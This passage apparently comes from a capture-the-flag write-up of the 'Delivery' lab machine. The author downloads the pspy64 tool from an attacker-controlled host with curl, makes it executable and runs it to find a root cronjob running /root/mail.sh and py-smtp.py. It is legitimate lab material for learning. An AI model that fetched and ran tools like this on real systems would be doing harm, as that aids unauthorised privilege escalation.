PSPY


A root cronjob process was found.

maildeliverer@delivery:/tmp$ curl -s http://10.10.14.5/pspy64 -O /tmp/pspy64 ; chmod 755 /tmp/pspy64

Delivery complete

maildeliverer@delivery:/tmp$ ./pspy64 
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒   ██▒▒██▄█▓▒ ▐██▓░
    ▒██▒  ░▒██████▒▒▒██▒ ██▒▓░
    ▒▓▒░  ░▒ ▒▓▒ ░▒▓▒░  ██▒▒▒ 
    ░▒ ░▒ ░░▒     ▓██ ░▒░ 
    ░░  ░░ ░░  
     
     
 
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

Executing PSPY

It appears that the root cronjob is executing a Bash script located at /root/mail.sh, and the following command right after; pgrep -f py-smtp.py The python script, py-smtp.py, was seen in the process as well.

maildeliverer@delivery:/tmp$ find / -name py-smtp.py -ls -type f 2>/dev/null

I am unable to locate it as it was located in the /root directory according to the process enumeration